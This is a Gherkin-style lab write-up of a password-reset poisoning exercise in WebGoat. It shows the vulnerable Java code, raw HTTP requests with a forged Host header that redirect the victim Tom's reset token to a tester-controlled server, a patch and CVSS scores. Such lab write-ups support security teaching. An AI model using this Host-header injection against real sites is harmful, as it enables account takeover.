## Version 1.4.1
## language: en

Feature:
  TOE:
    WebGoat
  Category:
    Password Reset
  Location:
    /WebGoat/PasswordReset/reset/create-password-reset-link - Host (Header)
  CWE:
    CWE-640: Weak Password Recovery Mechanism for Forgotten Password
  Goal:
    Get the users password reset token and reset his password
  Recommendation:
    Don't trust the Host header from requests, or make a hostname whitelist

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running WebGoat on http://localhost

  Scenario: Normal use case
    Given I go to WebGoat/start.mvc#lesson/PasswordReset.lesson/4
    And I get a login page
    Then I click "Forgot your password?"
    Then I submit my email and get a pass reset email

  Scenario: Static detection
  Host header directly sent to user
    Given I check the code at password-reset/.../ResetLinkAssignment.java
    And I see
    """
    61  String resetLink = UUID.randomUUID().toString();
    62  resetLinks.add(resetLink);
    63  String host = request.getHeader("host");
    64  if (org.springframework.util.StringUtils.hasText(email)) {
    65      if (email.equals(TOM_EMAIL) && host.contains("9090")) { //User
                                                indeed changed the host header.
    66         userToTomResetLink.put(getWebSession().getUserName(), resetLink);
    67          fakeClickingLinkEmail(host, resetLink);
    68      } else {
    69          sendMailToUser(email, host, resetLink);
    70      }
    71  }
    """
    Then I notice it's getting the server to build the reset link from Host hdr
    Then I know if I can control the header I can control where the reset goes

  Scenario: Dynamic detection
  Detecting cache poisoning
    Given I intercept a GET request to the target URL with Burp
    And I see the request
    """
    POST /WebGoat/PasswordReset/reset/create-password-reset-link HTTP/1.1
    Host: 127.0.0.1:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101
    Firefox/65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,
    image/webp,*/*;q=0.8
    ...

    email=username%webgoat.com
    """
    Then I edit the Host header
    """
    POST /WebGoat/PasswordReset/reset/create-password-reset-link HTTP/1.1
    Host: 127.0.0.1:9090
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101
    Firefox/65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,
    image/webp,*/*;q=0.8
    ...

    email=username%webgoat.com
    """
    And forward the request
    Then I get an email with a reset secret link
    """
    Hi, you requested a password reset link, please use this link to reset your
    password.

    If you did not request this password change you can ignore this message.
    If you have any comments or questions, please do not hesitate to reach us at
    support@webgoat-cloud.org

    Kind regards,
    Team WebGoat
    """
    But this link points to the hostname I injected in my request instead
    Then I conclude I can trick another user into giving me his reset token

  Scenario: Exploitation
  Get a victims reset token
    Given I know the target is vulnerable to reset poisoning
    Then I forge a request that points Host to a server I control
    """
    POST /WebGoat/PasswordReset/reset/create-password-reset-link HTTP/1.1
    Host: 127.0.0.1:9090
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101
    Firefox/65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,
    image/webp,*/*;q=0.8
    ...

    email=tom%webgoat-cloud.org
    """
    Then I get the victims token in my server (evidence)[request.png]

  Scenario: Remediation
  Don't trust the header
    Given I have patched the code like this
    """
    61  String resetLink = UUID.randomUUID().toString();
    62  resetLinks.add(resetLink);
    63  String host = "127.0.0.1:8000";
    64  if (org.springframework.util.StringUtils.hasText(email)) {
    65      if (email.equals(TOM_EMAIL) && host.contains("9090")) {
                          //User indeed changed the host header.
    66         userToTomResetLink.put(getWebSession().getUserName(), resetLink);
    67          fakeClickingLinkEmail(host, resetLink);
    68      } else {
    69          sendMailToUser(email, host, resetLink);
    70      }
    71  }
    """
    And I try to get my reset email with a modified Host Header
    Then I get the correct link in my inbox
    """
    http://127.0.0.1:8000/WebGoat/PasswordReset/reset/reset-password/
    9749bd89-262b-41e6-9738-2d31c9f83c09
    """
    Then it doesn't work anymore, the vuln is patched.

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5/10 (Medium) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.2/10 (Medium) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.3/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2018-12-28